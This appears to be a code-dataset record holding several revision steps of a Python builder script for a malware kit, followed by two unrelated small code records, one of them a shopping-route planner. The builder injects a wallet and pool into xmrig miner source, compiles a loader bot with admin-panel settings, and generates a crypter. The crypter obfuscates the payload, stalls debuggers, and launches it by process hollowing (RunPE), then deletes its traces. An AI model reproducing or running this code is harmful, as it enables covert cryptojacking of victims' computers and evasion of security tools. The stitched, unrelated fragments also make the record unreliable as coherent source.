lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\n<mask token>\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-4": "<mask token>\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp', 'r') as f:\n file = f.read()\n file = file.replace('%u%', wallet)\n file = file.replace('%p%', pool)\n file = file.replace('%w%', ww)\n with open('D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp', 'w') as w:\n w.write(file)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\ex.cs', 'r') as f:\n file = f.read()\n file = file.replace('%l%', logger)\n file = file.replace('%a%', adminka)\n with open(os.getcwd() + '\\\\Bot\\\\Miner\\\\Program.cs', 'w') as w:\n w.write(file)\n\n\ndef writeBytes(key):\n with open(os.getcwd() + '\\\\file.txt', 'r') as f:\n file = f.read()\n with open(os.getcwd() + '\\\\Miner\\\\CryptRunPe\\\\winhost.cpp', 'w') as w:\n w.write(\n \"\"\"#include <stdafx.h>\n#include \"process.h\"\n #include \"memrun.h\"\nusing namespace std;\n\"\"\"\n )\n with open('ex.txt') as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\n\ndef compile(path, file):\n os.system(\n '%windir%\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\msbuild.exe \"' +\n path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileM(path, file):\n os.system('msbuild.exe \"' + path + file + '.sln\" /p:Configuration=Release')\n\n\ndef compileR(path, file):\n os.system('msbuild.exe \"' + path + file +\n '.sln\" /p:Configuration=Release /p:Platform=\"WIN32\"')\n\n\ndef xcopy(path, out):\n try:\n with open(path, 'rb') as f:\n file = f.read()\n with open(out, 'wb') as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = \"\"\"\n #include <Windows.h>\n #include <winternl.h>\n #include <iostream>\n #include <string>\n #include <fstream>\n using namespace std;\n int main()\n {\n FILE * file = fopen(\"in.exe\", \"rb\");\n if (file == NULL) return 0;\n fseek(file, 0, SEEK_END);\n long int size = ftell(file);\n fclose(file);\n file = fopen(\"in.exe\", \"rb\");\n unsigned char * in = (unsigned char *)malloc(size);\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] - 0x0%n%;\n }\n file = fopen(\"out.exe\", \"wb\");\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n for (int i = 0; i < size; i++) {\n in[i] = in[i] + 0x0%n%;\n }\n file = fopen(\"decr.exe\", \"wb\");\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\n fclose(file);\n return 0;\n }\n \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n os.system('g++ -o enc encoder.cpp')\n os.system('C:\\\\Python27\\\\python.exe cv.py')\n with open('file.txt', 'r') as r:\n with open(os.getcwd() + '\\\\src\\\\crypter\\\\crypter.cpp', 'w') as w:\n txt = \"\"\" #include \"stdafx.h\"\n #include \"Crypter.h\"\n #include <windows.h>\n #include <winternl.h>\n #pragma comment(lib,\"ws2_32.lib\")\n #pragma comment(lib,\"ntdll.lib\")\n \"\"\" + r.read() + \"\"\" int RunPortableExecutable(void* Image) {\n IMAGE_DOS_HEADER* DOSHeader;\n IMAGE_NT_HEADERS* NtHeader;\n IMAGE_SECTION_HEADER* SectionHeader;\n PROCESS_INFORMATION PI;\n STARTUPINFOA SI;\n CONTEXT* CTX;\n DWORD* ImageBase;\n void* pImageBase;\n int count;\n char buffer[MAX_PATH];\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\n char *CurrentFilePath = buffer;\n DOSHeader = PIMAGE_DOS_HEADER(Image);\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\n ZeroMemory(&PI, sizeof(PI));\n ZeroMemory(&SI, sizeof(SI));\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\n NtUnmapViewOfSection mNtUnmapViewOfSection;\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\n CTX->ContextFlags = CONTEXT_FULL;\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\n }\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\n ResumeThread(PI.hThread);\n return 0;\n }\n }\n }\n }\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\n for (int i = 0; i < 550000; i++)\n OutputDebugStringW(L\"\");\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\n unsigned char b = rawData[i] + 0x0%n%;\n rawData[i] = b;\n }\n Sleep(((rand() % 5 + 1) + 5) * 1000);\n RunPortableExecutable(rawData);\n return 0;\n } \"\"\"\n txt = txt.replace('%n%', str(key))\n w.write(txt)\n compileM(os.getcwd() + '\\\\src\\\\', 'ConsoleApplication1')\n xcopy(os.getcwd() + '\\\\src\\\\Release\\\\Crypter.exe', os.getcwd() +\n '\\\\' + name + '.exe')\n\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd() + '\\\\Bot\\\\', 'LoaderBot')\nxcopy(os.getcwd() + '\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe', 'Bot.exe')\ncompileR(os.getcwd() + '\\\\rig\\\\', 'xmrig')\nxcopy(os.getcwd() + '\\\\rig\\\\Release\\\\xmrig.exe', 'out.exe')\ncrypt('test', key)\nos.system('C:\\\\Python27\\\\python.exe cv.py')\nwriteBytes(key)\ncompileM(os.getcwd() + '\\\\Miner\\\\', 'winhost')\nxcopy(os.getcwd() + '\\\\Miner\\\\Release\\\\winhost.exe', 'in.exe')\nprint(os.getcwd() + '\\\\enc.exe')\nsubprocess.call(os.getcwd() + '\\\\enc.exe')\ncrypt('winhost', key)\nos.system('del file.txt')\nos.system('del in.exe')\nos.system('del out.exe')\nos.system('del decr.exe')\nos.system('del enc.exe')\nos.system('del test.exe')\n",
"step-5": "import os, sys, time, random, subprocess\n\n\ndef load_userdata(wallet, pool, ww, logger, adminka):\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\ex.cpp\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%u%\", wallet)\n file = file.replace(\"%p%\", pool)\n file = file.replace(\"%w%\", ww)\n with open(\"D:\\\\msys64\\\\xmrig-master\\\\src\\\\xmrig.cpp\", \"w\") as w:\n w.write(file)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\ex.cs\", \"r\") as f:\n file = f.read()\n file = file.replace(\"%l%\", logger)\n file = file.replace(\"%a%\", adminka)\n with open(os.getcwd()+\"\\\\Bot\\\\Miner\\\\Program.cs\", \"w\") as w:\n w.write(file)\n\ndef writeBytes(key):\n with open(os.getcwd()+\"\\\\file.txt\", \"r\") as f:\n file = f.read()\n with open(os.getcwd()+\"\\\\Miner\\\\CryptRunPe\\\\winhost.cpp\", \"w\") as w:\n w.write(\"#include <stdafx.h>\\n#include \\\"process.h\\\"\\n #include \\\"memrun.h\\\"\\nusing namespace std;\\n\")\n with open(\"ex.txt\") as ex:\n w.write(file)\n exx = ex.read()\n w.write(exx)\n\ndef compile(path, file):\n os.system(\"%windir%\\Microsoft.NET\\Framework\\\\v4.0.30319\\msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\t\ndef compileM(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release\")\n\ndef compileR(path, file):\n os.system(\"msbuild.exe \\\"\"+path+file+\".sln\\\" /p:Configuration=Release /p:Platform=\\\"WIN32\\\"\")\ndef xcopy(path, out):\n try:\n with open(path, \"rb\") as f:\n file = f.read()\n with open(out, \"wb\") as w:\n w.write(bytearray(file))\n except:\n pass\n\n\ndef crypt(name, key):\n with open('encoder.cpp', 'w') as w:\n txt = '\\n\\\n #include <Windows.h>\\n\\\n #include <winternl.h>\\n\\\n #include <iostream>\\n\\\n #include <string>\\n\\\n #include <fstream>\\n\\\n using namespace std;\\n\\\n int main()\\n\\\n {\\n\\\n FILE * file = fopen(\"in.exe\", \"rb\");\\n\\\n if (file == NULL) return 0;\\n\\\n fseek(file, 0, SEEK_END);\\n\\\n long int size = ftell(file);\\n\\\n fclose(file);\\n\\\n file = fopen(\"in.exe\", \"rb\");\\n\\\n unsigned char * in = (unsigned char *)malloc(size);\\n\\\n int bytes_read = fread(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] - 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"out.exe\", \"wb\");\\n\\\n int bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n for (int i = 0; i < size; i++) {\\n\\\n in[i] = in[i] + 0x0%n%;\\n\\\n }\\n\\\n file = fopen(\"decr.exe\", \"wb\");\\n\\\n bytes_written = fwrite(in, sizeof(unsigned char), size, file);\\n\\\n fclose(file);\\n\\\n return 0;\\n\\\n }\\n\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n os.system(\"g++ -o enc encoder.cpp\")\n os.system(\"C:\\Python27\\python.exe cv.py\")\n with open('file.txt', 'r') as r:\n with open(os.getcwd()+\"\\\\src\\\\crypter\\\\crypter.cpp\", \"w\") as w:\n txt = '\\\n #include \"stdafx.h\"\\n\\\n #include \"Crypter.h\"\\n\\\n #include <windows.h>\\n\\\n #include <winternl.h>\\n\\\n #pragma comment(lib,\"ws2_32.lib\")\\n\\\n #pragma comment(lib,\"ntdll.lib\")\\n\\\n '+ r.read() + '\\\n int RunPortableExecutable(void* Image) {\\n\\\n IMAGE_DOS_HEADER* DOSHeader;\\n\\\n IMAGE_NT_HEADERS* NtHeader;\\n\\\n IMAGE_SECTION_HEADER* SectionHeader;\\n\\\n PROCESS_INFORMATION PI;\\n\\\n STARTUPINFOA SI;\\n\\\n CONTEXT* CTX;\\n\\\n DWORD* ImageBase;\\n\\\n void* pImageBase;\\n\\\n int count;\\n\\\n char buffer[MAX_PATH];\\n\\\n GetModuleFileNameA(NULL, (LPSTR)buffer, MAX_PATH);\\n\\\n char *CurrentFilePath = buffer;\\n\\\n DOSHeader = PIMAGE_DOS_HEADER(Image);\\n\\\n NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew);\\n\\\n if (NtHeader->Signature == IMAGE_NT_SIGNATURE) {\\n\\\n ZeroMemory(&PI, sizeof(PI));\\n\\\n ZeroMemory(&SI, sizeof(SI));\\n\\\n typedef LONG(WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);\\n\\\n NtUnmapViewOfSection mNtUnmapViewOfSection;\\n\\\n if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, &SI, &PI)) {\\n\\\n CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));\\n\\\n CTX->ContextFlags = CONTEXT_FULL;\\n\\\n if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) {\\n\\\n ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);\\n\\\n pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),\\n\\\n NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);\\n\\\n WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);\\n\\\n for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++) {\\n\\\n SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),\\n\\\n LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);\\n\\\n }\\n\\\n WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);\\n\\\n CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;\\n\\\n SetThreadContext(PI.hThread, LPCONTEXT(CTX));\\n\\\n ResumeThread(PI.hThread);\\n\\\n return 0;\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n }\\n\\\n int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) {\\n\\\n for (int i = 0; i < 550000; i++)\\n\\\n OutputDebugStringW(L\"\");\\n\\\n for (int i = 0; i < sizeof(rawData) / sizeof(*rawData); i++) {\\n\\\n unsigned char b = rawData[i] + 0x0%n%;\\n\\\n rawData[i] = b;\\n\\\n }\\n\\\n Sleep(((rand() % 5 + 1) + 5) * 1000);\\n\\\n RunPortableExecutable(rawData);\\n\\\n return 0;\\n\\\n }\\\n '\n txt = txt.replace(\"%n%\", str(key))\n w.write(txt)\n compileM(os.getcwd()+\"\\\\src\\\\\", \"ConsoleApplication1\")\n xcopy(os.getcwd() + \"\\\\src\\\\Release\\\\Crypter.exe\", os.getcwd()+\"\\\\\"+name+\".exe\")\n\nkey = random.randint(1, 100)\nu = sys.argv[1]\nw = sys.argv[2]\np = sys.argv[3]\nl = sys.argv[4]\na = sys.argv[5]\n\n\n\nload_userdata(u, p, w, l, a)\ncompile(os.getcwd()+\"\\\\Bot\\\\\", \"LoaderBot\")\nxcopy(os.getcwd()+\"\\\\Bot\\\\Miner\\\\bin\\\\Release\\\\LoaderBot.exe\", \"Bot.exe\")\ncompileR(os.getcwd()+\"\\\\rig\\\\\", \"xmrig\")\nxcopy(os.getcwd()+\"\\\\rig\\\\Release\\\\xmrig.exe\", \"out.exe\")\ncrypt(\"test\", key)\nos.system(\"C:\\Python27\\python.exe cv.py\")\nwriteBytes(key)\ncompileM(os.getcwd()+\"\\\\Miner\\\\\", \"winhost\")\nxcopy(os.getcwd()+\"\\\\Miner\\\\Release\\\\winhost.exe\", \"in.exe\")\nprint(os.getcwd()+\"\\\\enc.exe\")\nsubprocess.call(os.getcwd()+\"\\\\enc.exe\")\ncrypt(\"winhost\", key)\n\nos.system(\"del file.txt\")\nos.system(\"del in.exe\")\nos.system(\"del out.exe\")\nos.system(\"del decr.exe\")\nos.system(\"del enc.exe\")\nos.system(\"del test.exe\")\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
from .feature import slide_show
def main(args=None):
if args:
slide_show(args[0])
|
normal
|
{
"blob_id": "8680c033662a89ed6fc73e65ec544b93558c4208",
"index": 688,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main(args=None):\n if args:\n slide_show(args[0])\n",
"step-3": "from .feature import slide_show\n\n\ndef main(args=None):\n if args:\n slide_show(args[0])\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import itertools
import numpy
import math
import psycopg2
import podatki
baza = podatki.baza
dom = podatki.preberi_lokacijo()
seznam_trgovin =["spar", "mercator", "tus", "hofer", "lidl"]
id_in_opis = podatki.id_izdelka_v_opis()
seznam_izdelkov = [el[0] for el in id_in_opis] #['cokolada', 'sladoled', ...]
mnozica_izdelkov = set(seznam_izdelkov)
trgovine_z_izdelki = podatki.trgovine_z_izdelki_f() #slovar: {'trgovina':['id1', 'id2'],...}
seznam_izdelkov_v_kosarici = [el[3] for el in podatki.kosarica]
'''
def zemljevid_trgovin(trgovine):
sez = []
for trgovina in trgovine:
sez.append([trgovina, [])
def kombinacije_trgovin(seznam_izdelkov):
sez_kombinacij = []
for trgovina in trgovine:
kombinacija = []
izdelki = sez_izdelkov
for izdelek in izdelki:
if izdelek in trgovina:
izdelki = izdelki.remove(izdelek)
'''
def kombinacije_trgovin_f(mnozica_izdelkov_v_kosarici, seznam_trgovin, trgovine_z_izdelki):
generator_kombinacij = (set(itertools.compress(seznam_trgovin, el)) for el in itertools.product(*[[0,1]]*len(seznam_trgovin)))
kombinacije = []
for mnozica_trgovin in generator_kombinacij:
izdelki_kombinacije = set()
for trgovina in mnozica_trgovin:
for izdelek in trgovine_z_izdelki[trgovina]:
izdelki_kombinacije.add(izdelek) #množica vseh izdelkov, ki jih lahko dobiš v danih trgovinah
if mnozica_izdelkov_v_kosarici.issubset(izdelki_kombinacije):
kombinacije.append(mnozica_trgovin)
for kombinacija in kombinacije:
for kombinacija2 in kombinacije:
if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija2)
elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija)
for kombinacija in kombinacije:
for kombinacija2 in kombinacije:
if kombinacija.issubset(kombinacija2) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija2)
elif kombinacija2.issubset(kombinacija) and kombinacija != kombinacija2:
kombinacije.remove(kombinacija)
return kombinacije
return None
def razdalja(vozlisce1, vozlisce2):
return math.sqrt((vozlisce2[1] - vozlisce1[1]) ** 2 + (vozlisce2[0] - vozlisce1[0]) ** 2)
#dom = [x,y]
def doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija):
skupine = [] #skupine vozlišč iste trgovine
poti = []
for trgovina in kombinacija:
skupine.append(podatki.lokacije(slovar_koordinat, trgovina))
for i in skupine[0]: #skupine[0] je seznam lokacij ene vrste trgovin
dolzina = razdalja(dom, i)
if len(kombinacija) > 1:
for j in skupine[1]:
dolzina += razdalja(i, j)
if len(kombinacija) > 2:
for k in skupine[2]:
dolzina += razdalja(j, k)
if len(kombinacija) > 3:
for m in skupine[3]:
dolzina += razdalja(k, m)
if len(kombinacija) > 4:
for n in skupine[4]:
dolzina += razdalja(m, n)
dolzina += razdalja(n, dom)
poti.append([[dom, i, j, k, m, n], dolzina])
dolzina = 0
else:
dolzina += razdalja(m, dom)
poti.append([[dom, i, j, k, m], dolzina])
dolzina = 0
else:
dolzina += razdalja(k, dom)
poti.append([[dom, i, j, k], dolzina])
dolzina = 0
else:
dolzina += razdalja(j, dom)
poti.append([[dom, i, j], dolzina])
dolzina = 0
else:
dolzina *= 2
poti.append([[dom, i], dolzina])
dolzina = 0
dolzine = [el[1] for el in poti]
if dolzine == []:
print("Nakupa ni mogoče opraviti.")
return None
mini = numpy.argmin(dolzine)
return poti[mini] #[[pot], dolzina]
return (dolzina, sez_vozlisc)
def doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki):
vozlisca = []
dolzine = []
trgovine = []
for kombinacija in kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki):
par = doloci_trgovine(dom, slovar_koordinat, seznam_izdelkov, kombinacija)
dolzine.append(par[1])
vozlisca.append(par[0])
trgovine.append(kombinacija)
if dolzine == []:
return None
i = numpy.argmin(dolzine)
v = vozlisca[i]
v.append(dom)
obiskane_trgovine = trgovine[i]
return v, obiskane_trgovine
def razporeditev(obiskane_trgovine, izdelki, slovar):
izdelki2 = izdelki.copy()
razporeditev = []
for trgovina in obiskane_trgovine:
sez = []
for izdelek in izdelki:
if {izdelek}.issubset(slovar[trgovina]):
izd = podatki.id_izdelka_v_opis()[izdelek-1]
sez.append(izd)
izdelki2.remove(izdelek)
razporeditev.append([trgovina, sez])
return razporeditev
baza.commit()
slovar_koordinat = podatki.slovar_koordinat
kombinacije_trgovin = kombinacije_trgovin_f(set(seznam_izdelkov_v_kosarici), seznam_trgovin, trgovine_z_izdelki)
#print(kombinacije_trgovin)'
pot, obiskane_trgovine = doloci_pot(dom, seznam_izdelkov, seznam_trgovin, seznam_izdelkov_v_kosarici, trgovine_z_izdelki)
razpredelnica = razporeditev(obiskane_trgovine, seznam_izdelkov_v_kosarici, podatki.trgovine_z_izdelki)
|
normal
|
{
"blob_id": "5a0702dd869862ebc27c83d10e0b1f0575de68a7",
"index": 2944,
